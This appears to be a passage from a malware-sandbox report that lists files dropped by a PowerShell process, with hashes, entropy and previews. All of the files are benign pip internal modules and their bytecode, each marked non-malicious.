                                                                                                    Preview:"""Filetype information.."""..from typing import Tuple..from pip._internal.utils.misc import splitext..WHEEL_EXTENSION = ".whl".BZ2_EXTENSIONS: Tuple[str, ...] = (".tar.bz2", ".tbz").XZ_EXTENSIONS: Tuple[str, ...] = (. ".tar.xz",. ".txz",. ".tlz",. ".tar.lz",. ".tar.lzma",.).ZIP_EXTENSIONS: Tuple[str, ...] = (".zip", WHEEL_EXTENSION).TAR_EXTENSIONS: Tuple[str, ...] = (".tar.gz", ".tgz", ".tar").ARCHIVE_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS + XZ_EXTENSIONS...def is_archive_file(name: str) -> bool:. """Return True if `name` is a considered as an archive file.""". ext = splitext(name)[1].lower(). if ext in ARCHIVE_EXTENSIONS:. return True. return False.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3113
                                                                                                    Entropy (8bit):4.827361926561468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZMNMpeTLWUrUbFOt6eI0J3PeIOwea072T5ECUtGL7xMcIko/VKY:ZMNZTLWUr+wR1LOZ72TweKzF/VKY
                                                                                                    MD5:A806CD4E60BF0FECAF532A9B5B31EB5B
                                                                                                    SHA1:993BE097901608F3160F7E3FAFECCD7D1D21CA27
                                                                                                    SHA-256:31EB31C6083704BC6178B671F9D49FDF46FA80AA4E81D557C3A5BEFAE1D2B334
                                                                                                    SHA-512:8C182D639D0E8FA33357CFEE3368372D06EC0EAA393E61E77697F81D67D811A978FD4F90C220B10BF41BFA3D4BA4A132DCE55B9392E7B93E0A5185652D934C8C
                                                                                                    Malicious:false
                                                                                                    Preview:import os.import sys.from typing import Optional, Tuple...def glibc_version_string() -> Optional[str]:. "Returns glibc version string, or None if not using glibc.". return glibc_version_string_confstr() or glibc_version_string_ctypes()...def glibc_version_string_confstr() -> Optional[str]:. "Primary implementation of glibc_version_string using os.confstr.". # os.confstr is quite a bit faster than ctypes.DLL. It's also less likely. # to be broken or missing. This strategy is used in the standard library. # platform module:. # https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183. if sys.platform == "win32":. return None. try:. gnu_libc_version = os.confstr("CS_GNU_LIBC_VERSION"). if gnu_libc_version is None:. return None. # os.confstr("CS_GNU_LIBC_VERSION") returns a string like "glibc 2.17":. _, version = gnu_libc_version.split(). except (AttributeError, OSErr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5118
                                                                                                    Entropy (8bit):4.517865882857644
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fvrEB0PsuMoLSGXoTV+HmGX8s6yIibhrHLNdbf8+EH0Kj:7ELbG4TV+HmO8smi1rHJ9fMHfj
                                                                                                    MD5:EA92F1296B5F78FF606AB11DD214F312
                                                                                                    SHA1:F88BDEA46699ABB220C1F5720B4652629CB16B28
                                                                                                    SHA-256:3233A2802EF9CFAAA844C9201E21EAA2DEDEAB17F00D94AB11F94930F9BE6C71
                                                                                                    SHA-512:D1707C0A8775A1C7621C81E7ACBCF308E01F4684B3AB45350E777F39FB0B5B0F64ADC78DD181F4DFF3B36F4D41906FACCCE10DAD3A7F3E430D1559004ECC4DCA
                                                                                                    Malicious:false
                                                                                                    Preview:import hashlib.from typing import TYPE_CHECKING, BinaryIO, Dict, Iterable, List, Optional..from pip._internal.exceptions import HashMismatch, HashMissing, InstallationError.from pip._internal.utils.misc import read_chunks..if TYPE_CHECKING:. from hashlib import _Hash.. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn...# The recommended hash algo of the moment. Change this whenever the state of.# the art changes; it won't hurt backward compatibility..FAVORITE_HASH = "sha256"...# Names of hashlib algorithms allowed by the --hash option and ``pip hash``.# Currently, those are the ones at least as collision-resistant as sha256..STRONG_HASHES = ["sha256", "sha384", "sha512"]...class Hashes:. """A wrapper that builds multiple hashes at once and checks them against. known-good values.. """.. def __init__(self, hashes: Optional[Dict[str, List[str]]] = No
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11603
                                                                                                    Entropy (8bit):4.446627443976613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qiZ5NF0lNQR6DWUDZr2Huat0L1Si2hx5pVADOrliz19UIMAcEzZnz+:qiZ5NePQR6XZKKLQDpVaAgzZMAbzZC
                                                                                                    MD5:0AD835A23492444085B4AED4A530E370
                                                                                                    SHA1:6CFC66CC5325E5E0D1DE8C31202EB486D71EBC0F
                                                                                                    SHA-256:7DDB6E649F802A4AB00D300D0EF19C044A6CB0BF1E97B4F58E7C24D429D99776
                                                                                                    SHA-512:C472B6D25C98EAA39C49ACE5F37A624988BA999D2379077945F9D8974A207AF04BD136018FF7FA34D56DDA95907269DD18D7157850CF7CC5D91E52889567F464
                                                                                                    Malicious:false
                                                                                                    Preview:import contextlib.import errno.import logging.import logging.handlers.import os.import sys.import threading.from dataclasses import dataclass.from io import TextIOWrapper.from logging import Filter.from typing import Any, ClassVar, Generator, List, Optional, TextIO, Type..from pip._vendor.rich.console import (. Console,. ConsoleOptions,. ConsoleRenderable,. RenderableType,. RenderResult,. RichCast,.).from pip._vendor.rich.highlighter import NullHighlighter.from pip._vendor.rich.logging import RichHandler.from pip._vendor.rich.segment import Segment.from pip._vendor.rich.style import Style..from pip._internal.utils._log import VERBOSE, getLogger.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import DEPRECATION_MSG_PREFIX.from pip._internal.utils.misc import ensure_dir.._log_state = threading.local().subprocess_logger = getLogger("pip.subprocessor")...class BrokenStdoutLoggingError(Exception):. """. Raised if BrokenPipeError oc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23623
                                                                                                    Entropy (8bit):4.7563719569294
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6dRrq8/RVgKgUkgpDvxLUcK/Mi3R2AlEvPOu/O0CYkjQE0RAEqibCGMbuVWP3/vN:6dRrq85tFLWb/vB2UUOzUQQEibCNCUP9
                                                                                                    MD5:E6A83F5B8D0DD3744860E95B00F165E1
                                                                                                    SHA1:872DF28D996A12A42EE287A09E0C88386C6C4FE4
                                                                                                    SHA-256:7CD5F069E7A292F9D4B7808F30520BE3E2106D90F1C638F88C3A730A2E19B0EC
                                                                                                    SHA-512:3F91620184643000F8278F4D2965F4D022324FC133933336C7860A835DEF9072CA0D659EC095834FABBEE11163F8BE98D8D79519CE2F448A022327091053B084
                                                                                                    Malicious:false
                                                                                                    Preview:import contextlib.import errno.import getpass.import hashlib.import io.import logging.import os.import posixpath.import shutil.import stat.import sys.import sysconfig.import urllib.parse.from functools import partial.from io import StringIO.from itertools import filterfalse, tee, zip_longest.from pathlib import Path.from types import FunctionType, TracebackType.from typing import (. Any,. BinaryIO,. Callable,. ContextManager,. Dict,. Generator,. Iterable,. Iterator,. List,. Optional,. TextIO,. Tuple,. Type,. TypeVar,. Union,. cast,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.pyproject_hooks import BuildBackendHookCaller.from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip import __version__.from pip._internal.exceptions import CommandError, ExternallyManagedEnvironment.from pip._internal.locations import get_major_minor_version.from pip._internal.utils.compat import WINDOWS.from
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1193
                                                                                                    Entropy (8bit):4.604961326505357
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:GYV8VwJAxxFcyTQeQbnmSjmjg/yCXryJIIv:D2wJocOWpjmsqCXrEII
                                                                                                    MD5:2CEC238042EBD1D49C71C8901BBCB028
                                                                                                    SHA1:3DD814E8C7938BFDBBBFEA5EFB457EB59FCD0F2D
                                                                                                    SHA-256:E46A18539F3A4ABC5444CBC39FF8C13092278ADBE2260E0EE7E88E53EE88D166
                                                                                                    SHA-512:8A85DAAE5682CEA6BFECE76F9249CA9C93165174D02143FF8C36EC911E651820F852A0CE3E00F8EA06DFFD95B4DCF43178A9B49D0030A3D3F1F26ABEBFDEF342
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utilities for defining models."""..import operator.from typing import Any, Callable, Type...class KeyBasedCompareMixin:. """Provides comparison capabilities that is based on a key""".. __slots__ = ["_compare_key", "_defining_class"].. def __init__(self, key: Any, defining_class: Type["KeyBasedCompareMixin"]) -> None:. self._compare_key = key. self._defining_class = defining_class.. def __hash__(self) -> int:. return hash(self._compare_key).. def __lt__(self, other: Any) -> bool:. return self._compare(other, operator.__lt__).. def __le__(self, other: Any) -> bool:. return self._compare(other, operator.__le__).. def __gt__(self, other: Any) -> bool:. return self._compare(other, operator.__gt__).. def __ge__(self, other: Any) -> bool:. return self._compare(other, operator.__ge__).. def __eq__(self, other: Any) -> bool:. return self._compare(other, operator.__eq__).. def _compare(self, other: Any, meth
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2108
                                                                                                    Entropy (8bit):4.7637552285305045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:jncRgRE2HwcqDvLSwcqzpHhTR4kLmVTt4zSecRgE+MK8Uz37Xu:jcRgRVHwceOwc2pBTvaVTtgkST8UDK
                                                                                                    MD5:44BE67AD6261ED654E8AD10A7FFDAA1F
                                                                                                    SHA1:F9673A16D2FE6A03E450EE1E0D2C8C67EA812B87
                                                                                                    SHA-256:E569BAFF1EE52AB96A5633C8E4C04DFD1BAB7111F0558A10ECAB2BB3CE1D7BBB
                                                                                                    SHA-512:59FC39A6006AE2208A171D39D441E9A17ABA04EB0DCC7FA53BA9A5922E7ED95F5A2DCA504691D282C4D470878A313A69592AB0F8BA63D2EE53A27E959B8CC4C3
                                                                                                    Malicious:false
                                                                                                    Preview:import functools.import logging.import re.from typing import NewType, Optional, Tuple, cast..from pip._vendor.packaging import specifiers, version.from pip._vendor.packaging.requirements import Requirement..NormalizedExtra = NewType("NormalizedExtra", str)..logger = logging.getLogger(__name__)...def check_requires_python(. requires_python: Optional[str], version_info: Tuple[int, ...].) -> bool:. """. Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :raises InvalidSpecifier: If `requires_python` has an invalid format.. """. if requires_python is None:. # The package provides no information. return True. requires_python_specifier = specifiers.SpecifierSet(requires_python).. pyth
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4435
                                                                                                    Entropy (8bit):4.699482613201015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kbgreKp42fODz3khb1T8B94gMGlbJNaX8F0K34VTdtBN:kbghp4zDz0vinllLaz1djN
                                                                                                    MD5:9AE597EF5E68B8DD221A74A47327B0E6
                                                                                                    SHA1:B3BCCB4896004FF798DA12A3D87978F7B62EFC45
                                                                                                    SHA-256:A2E5E9B9DFA3792F313F24CFB1727E9B7E0D3EF2B9A2CE39A2D03375257F2091
                                                                                                    SHA-512:DB55ECACE9AEA1C8EFCE7D30664FD66A17C7D1A3735E4AAAEFDE39048BE75D0268542E925C5B30DEBBEB6063F6A465289B4C786EC3753A1BB4E424AA75017006
                                                                                                    Malicious:false
                                                                                                    Preview:import sys.import textwrap.from typing import List, Optional, Sequence..# Shim to wrap setup.py invocation with setuptools.# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on.# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").._SETUPTOOLS_SHIM = textwrap.dedent(. """. exec(compile('''. # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py. #. # - It imports setuptools before invoking setup.py, to enable projects that directly. # import from `distutils.core` to work with newer packaging standards.. # - It provides a clear error message when setuptools is not installed.. # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so. # setuptools doesn't think the script is `-c`. This avoids the following warning:. # manifest_maker: standard file '-c' not found".. # - It generates a shim setup.py, for handling setup.cfg-only projects.. import os, sys, t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9207
                                                                                                    Entropy (8bit):4.453211429819829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TbMPTT/+tsJHXvM2rJicKl5zLeuBTyTt+WW+JC:TbMPTqcMfFBTyTtQ
                                                                                                    MD5:17BD4BC40EECB1E99A4F82FBF350CE85
                                                                                                    SHA1:2A5EF413060467B26635CECB25418BA5F1308B11
                                                                                                    SHA-256:CF376299BEF98D52C4D465385A54D9D39E60733843EE7D72D714DC35CEEF3594
                                                                                                    SHA-512:CD027A1AA823B476B55C39AC5DAF49922DA74283658FE4ADA47E66E57793F77216DB8EA7914296B74835EDE1A4A126FCE83598356400BD854C7808C4CCFEC3ED
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.import shlex.import subprocess.from typing import (. TYPE_CHECKING,. Any,. Callable,. Iterable,. List,. Mapping,. Optional,. Union,.)..from pip._vendor.rich.markup import escape..from pip._internal.cli.spinners import SpinnerInterface, open_spinner.from pip._internal.exceptions import InstallationSubprocessError.from pip._internal.utils.logging import VERBOSE, subprocess_logger.from pip._internal.utils.misc import HiddenText..if TYPE_CHECKING:. # Literal was introduced in Python 3.8.. #. # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.. from typing import Literal..CommandArgs = List[Union[str, HiddenText]]...def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:. """. Create a CommandArgs object.. """. command_args: CommandArgs = []. for arg in args:. # Check for list instead of CommandArgs since CommandArgs is. # only known during type-checking..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9312
                                                                                                    Entropy (8bit):4.365866948736783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLimqx5ejyJSWl6pU/0VJB6cDtbKRp8dCLks+ajs8yCLDU0HkJqltwaV4Ypkq3l4:6m+sjyJN62Abty88gtinltU
                                                                                                    MD5:913F777212E4D08649A817F723CDB63F
                                                                                                    SHA1:0318C8A2E74430EEC9CD32CC2A5C762493014187
                                                                                                    SHA-256:0D4030DB6B85AEE41D2B8DE2D8BD8AE770BE0838D108F780B01289A6EFAB1D0E
                                                                                                    SHA-512:73CEB507E3863AD1355498DA0F677571EBF775FC1017183803B783FA745FC0B78889212C0ACB027950CE40B0E25CEB8BCF63A3458F281249430F70673C498648
                                                                                                    Malicious:false
                                                                                                    Preview:import errno.import itertools.import logging.import os.path.import tempfile.import traceback.from contextlib import ExitStack, contextmanager.from pathlib import Path.from typing import (. Any,. Callable,. Dict,. Generator,. List,. Optional,. TypeVar,. Union,.)..from pip._internal.utils.misc import enum, rmtree..logger = logging.getLogger(__name__).._T = TypeVar("_T", bound="TempDirectory")...# Kinds of temporary directories. Only needed for ones that are.# globally-managed..tempdir_kinds = enum(. BUILD_ENV="build-env",. EPHEM_WHEEL_CACHE="ephem-wheel-cache",. REQ_BUILD="req-build",.)..._tempdir_manager: Optional[ExitStack] = None...@contextmanager.def global_tempdir_manager() -> Generator[None, None, None]:. global _tempdir_manager. with ExitStack() as stack:. old_tempdir_manager, _tempdir_manager = _tempdir_manager, stack. try:. yield. finally:. _tempdir_manager = old_tempdir_manager...class TempDirecto
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8821
                                                                                                    Entropy (8bit):4.428223920452587
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:yFfRQWGbY5i3q0En361k7xHWOvhUg4trsHMh2UWcvdtjck8NxtBxtRe1ZXM8hyc:o7P5Gq0E368ZvuthzvZ8NxtBxtReAQ
                                                                                                    MD5:1F709C05BB91A3BF657BEC730B3FF8D5
                                                                                                    SHA1:9761F6164167AF6B9EF5F4BDB68299B6C48DB277
                                                                                                    SHA-256:4816F6895D5CADBF3D30345310A63CE91E00FD43960294D09FD55055C3033A51
                                                                                                    SHA-512:3CD2CD55E747F9A96A9F967367530DD10A0887A778BDA8DACADA5D204943BE59E92E21ED62A58DF23592A0F02544CE6C59B6F06EC2CB835E1EBCB14AE8338FB6
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utilities related archives.."""..import logging.import os.import shutil.import stat.import tarfile.import zipfile.from typing import Iterable, List, Optional.from zipfile import ZipInfo..from pip._internal.exceptions import InstallationError.from pip._internal.utils.filetypes import (. BZ2_EXTENSIONS,. TAR_EXTENSIONS,. XZ_EXTENSIONS,. ZIP_EXTENSIONS,.).from pip._internal.utils.misc import ensure_dir..logger = logging.getLogger(__name__)...SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS..try:. import bz2 # noqa.. SUPPORTED_EXTENSIONS += BZ2_EXTENSIONS.except ImportError:. logger.debug("bz2 module is not available")..try:. # Only for Python 3.3+. import lzma # noqa.. SUPPORTED_EXTENSIONS += XZ_EXTENSIONS.except ImportError:. logger.debug("lzma module is not available")...def current_umask() -> int:. """Get the current umask which involves having to set it temporarily.""". mask = os.umask(0). os.umask(mask). return mask...def split_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1759
                                                                                                    Entropy (8bit):4.587172040585541
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BHphSbWppG7XgI/LwN8C8Q0U9XUOsunuf90ZQ1XZ6feSv:rfpOgcLspYOsMuV0ZQ9OXv
                                                                                                    MD5:918837F1E3B41DCD1CE4B7A334BDF84F
                                                                                                    SHA1:FFB06FCE78F5DA3DFA1BF3F8B428DDA882893684
                                                                                                    SHA-256:02169EB141A5FBD8ADEAEBC6E9FB053CEAFDCA716919A4CC938B795D35FB67F4
                                                                                                    SHA-512:102286AFB35EF9EF3220FC4C247DE22139FE05A0DE995288E0DF1FC997DD4396F87CCF2C9505B5EF82FC2FF9A3D0B8043A03BF80903B5785AC34C00D44065727
                                                                                                    Malicious:false
                                                                                                    Preview:import os.import string.import urllib.parse.import urllib.request.from typing import Optional..from .compat import WINDOWS...def get_url_scheme(url: str) -> Optional[str]:. if ":" not in url:. return None. return url.split(":", 1)[0].lower()...def path_to_url(path: str) -> str:. """. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. """. path = os.path.normpath(os.path.abspath(path)). url = urllib.parse.urljoin("file:", urllib.request.pathname2url(path)). return url...def url_to_path(url: str) -> str:. """. Convert a file: URL to a path.. """. assert url.startswith(. "file:". ), f"You can only turn file: urls into filenames (not {url!r})".. _, netloc, path, _, _ = urllib.parse.urlsplit(url).. if not netloc or netloc == "localhost":. # According to RFC 8089, same as empty authority.. netloc = "". elif WINDOWS:. # If we have a UNC path, prepend UNC share notati
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3456
                                                                                                    Entropy (8bit):4.796313154979711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ri5HUYfOUVBSjKR1d0JK1PTgBHHf5VjeY3jowoVEod7MOSQiy7d1G/:ryf/sKRb0cPTCBtpoeox/SQDfG/
                                                                                                    MD5:15111B45000FB18281FB5DFE8DC4EF70
                                                                                                    SHA1:14CB66AA6EA7945B643769280466DA0FD10FEBAC
                                                                                                    SHA-256:4BA7FB72C628AD1A620FA72F9F78C849961CDC8F0F242E371F988C1694401035
                                                                                                    SHA-512:16A2360E23C1CFBFABF4F171B4D989094B8FE9F8AA6842930D5C8BD6DCED85DE206B448DF5F29E3495A95A0E5495813AB4049A015B04B3905D62E86BB8DFF678
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.import re.import site.import sys.from typing import List, Optional..logger = logging.getLogger(__name__)._INCLUDE_SYSTEM_SITE_PACKAGES_REGEX = re.compile(. r"include-system-site-packages\s*=\s*(?P<value>true|false)".)...def _running_under_venv() -> bool:. """Checks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. """. return sys.prefix != getattr(sys, "base_prefix", sys.prefix)...def _running_under_legacy_virtualenv() -> bool:. """Checks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. """. # pypa/virtualenv case. return hasattr(sys, "real_prefix")...def running_under_virtualenv() -> bool:. """True if we're running inside a virtual environment, False otherwise.""". return _running_under_venv() or _running_under_legacy_virtualenv()...def _get_pyvenv_cfg_lines() -> Optional[List[str]]:. """Reads {sys.prefix}/pyvenv.cfg and returns
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4499
                                                                                                    Entropy (8bit):4.752610172437855
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:KrIg+2rhcy2TRgR/1XRLrDtNxu5Sfs8nkm2dHwvqwBfg8g4k:klplYtgRLLrhNYUfs89f5B4h4k
                                                                                                    MD5:576FFCEAB3FF43B59DACB1950B7A734B
                                                                                                    SHA1:EBEBECB94DF0AEE12848FE846E7D2CAF9FB617AE
                                                                                                    SHA-256:8B807050D1DAB6DCCDD22C72DC7040174E2D64F461D82731693EADF3ABE2C241
                                                                                                    SHA-512:8640CCB2B119FAB0AD265CAB76EF24970ABF9CFF26588D85606F5317C195F233D044A7485631F795EB40C79DFAF2CD1669D57AEA955EA01230D04527E3F484AD
                                                                                                    Malicious:false
                                                                                                    Preview:"""Support functions for working with wheel files.."""..import logging.from email.message import Message.from email.parser import Parser.from typing import Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import UnsupportedWheel..VERSION_COMPATIBLE = (1, 0)...logger = logging.getLogger(__name__)...def parse_wheel(wheel_zip: ZipFile, name: str) -> Tuple[str, Message]:. """Extract information from the provided wheel, ensuring it meets basic. standards... Returns the name of the .dist-info directory and the parsed WHEEL metadata.. """. try:. info_dir = wheel_dist_info_dir(wheel_zip, name). metadata = wheel_metadata(wheel_zip, info_dir). version = wheel_version(metadata). except UnsupportedWheel as e:. raise UnsupportedWheel(f"{name} has an invalid wheel, {str(e)}").. check_compatibility(version, name).. return info_dir, metadata...def wheel_dist_info_d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):596
                                                                                                    Entropy (8bit):4.658154431455551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:AU7ndNAXB6D5dBZnM4mSMWgeXgkJVEOwsfJs3CKnBu:A1YDj/nM4Y3eXguVooJcBu
                                                                                                    MD5:EBA6BD4ACA847FBF75D548FF07627DDC
                                                                                                    SHA1:DDF20F97603F281DC422347D7B063A0C31D728B7
                                                                                                    SHA-256:500AAFCE96E2D156D9A3751BEAC904799030FA8A08651FB35FF5A909BC720A85
                                                                                                    SHA-512:DC6F2589DE14F458DA792AD235E62175B72AA1A97934F9717895AAFFFC2DB8CD70B6EEFF5763ACC92212646576E13F76E6EF9792F872DDB1D537A46979FDA79D
                                                                                                    Malicious:false
                                                                                                    Preview:# Expose a limited set of classes and functions so callers outside of.# the vcs package don't need to import deeper than `pip._internal.vcs`..# (The test directory may still need to import from a vcs sub-package.).# Import all vcs modules to register each VCS in the VcsSupport object..import pip._internal.vcs.bazaar.import pip._internal.vcs.git.import pip._internal.vcs.mercurial.import pip._internal.vcs.subversion # noqa: F401.from pip._internal.vcs.versioncontrol import ( # noqa: F401. RemoteNotFoundError,. RemoteNotValidError,. is_url,. make_vcs_requirement_url,. vcs,.).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):540
                                                                                                    Entropy (8bit):5.3323371996372115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:fCaOLegf+W3C/HLV4CFqv8JOs+edImbgjaOt1lIlZn:fBWeciLV4rv8JO+3TOt1lYZ
                                                                                                    MD5:265B220F6258F9134BB4454190880DC2
                                                                                                    SHA1:652E64F7E84900CD6454BFD7BCDC2A66D11E7043
                                                                                                    SHA-256:5BEB7DCDFD686E99B5AB86641993A548A55E963D3FF06A662983F5BFBD266A74
                                                                                                    SHA-512:672421494BF4CA1DF8E82887B7F8037C73EF772083CA5BEE54EC01E9EE48C4240CE6659620ABFFA454F3A4EBC752CA8DD2EECFF5B5C8AF763F58DF3CAA309DC3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfT.........................@.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...y.)......N)...RemoteNotFoundError..RemoteNotValidError..is_url..make_vcs_requirement_url..vcs)...pip._internal.vcs.bazaar..pip..pip._internal.vcs.git..pip._internal.vcs.mercurial..pip._internal.vcs.subversion. pip._internal.vcs.versioncontrolr....r....r....r....r............fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/vcs/__init__.py..<module>r........s............. ....."..#..........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5032
                                                                                                    Entropy (8bit):5.4683448227860945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:KcHB7/Dbod6wQhKapNnTrb8ZyW0+sVINRsubU:KcdDbdwQhdXTrb8ZdtsVcsubU
                                                                                                    MD5:673C28B80CD6E69D7AAADAA073CCC010
                                                                                                    SHA1:24C13B94E06ED90E6D5AF76B540634501FB07CDD
                                                                                                    SHA-256:140FE62E1393E6820E56E09FE781D47B647E5FB5D8DC84A1E5047D15A2746C23
                                                                                                    SHA-512:7C15BBA2A462057CC8E1992C7CEDD8D8E6D9A5A761EBEA51BC221ADAD04835D5CF152C070A36606F03FCC331046DDF44664F1ABCB32A5D91D91B89C8BEBCF6A2
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j$..................e.........Z...G.d...d.e.........Z...e.j,..................e...........y.)......N)...List..Optional..Tuple)...HiddenText..display_path)...make_command)...path_to_url)...AuthInfo..RemoteNotFoundError..RevOptions..VersionControl..vcsc.............................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.e.....f.d...........Z.d.e.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.e.d.e.d.e.e.e.e.....e.f.....f...f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....d.e.f.d...........Z...x.Z.S.)...Bazaar..bzrz..bzr..branch).z.bzr+httpz.bzr+httpsz.bzr+sshz.bzr+sftpz.bzr+ftpz.bzr+lpz.bzr+file..rev..returnc...........................d.|.g.S.).Nz.-r..).r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/vcs/bazaar.py..get_base_rev_argsz.Bazaar.g
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19001
                                                                                                    Entropy (8bit):5.484361340799084
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:oKv0TY9EX+riHSetNe7wY9iaeuqS84rh0yHV0nxGC:oKv0UKX+rQztNe7wYUaeJS8IPC
                                                                                                    MD5:01EA8132565CB6F092C8411B2687ED8D
                                                                                                    SHA1:940C57FA0B65825B9164066A8C491AFA6D81C482
                                                                                                    SHA-256:F7E11B4E4A23DBD694EFDCEA65960F825404C065F16A4163323433C4A6D1CA94
                                                                                                    SHA-512:11F974623912B141DC9F3703C4741CA7687D63FE55A1D37E7A6ED5D3C8E308433E026524DAFF776AF9239C186D2EB4ECB0C589A2D1CBD5A4EE7E3FF56A16A5DC
                                                                                                    Malicious:false
